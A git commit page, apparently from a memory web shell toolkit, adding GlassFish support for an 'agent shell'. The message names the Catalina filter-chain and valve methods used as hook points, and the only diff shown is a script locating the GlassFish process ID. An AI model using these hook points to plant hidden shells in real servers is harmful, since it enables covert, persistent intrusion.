feat: support GlassFish agent shell (#23)

1. hook point1 is org.apache.catalina.core.ApplicationFilterChain.doFilter
2. hook point2 is org.apache.catalina.core.StandardContextValve.invoke
3. GlassFish use osgi module, cipher class not in web-core, so that should use ContextClassLoader (resolved #23)
This commit is contained in:
ReaJason
2025-01-10 00:56:26 +08:00
parent 1cd05fd89f
commit 14a7a9bac6
11 changed files with 115 additions and 44 deletions
+2
View File
@@ -0,0 +1,2 @@
#!/bin/bash
jps | grep -E "ASMain|GlassFishMain" | awk '{print $1}' | tr -d '\n'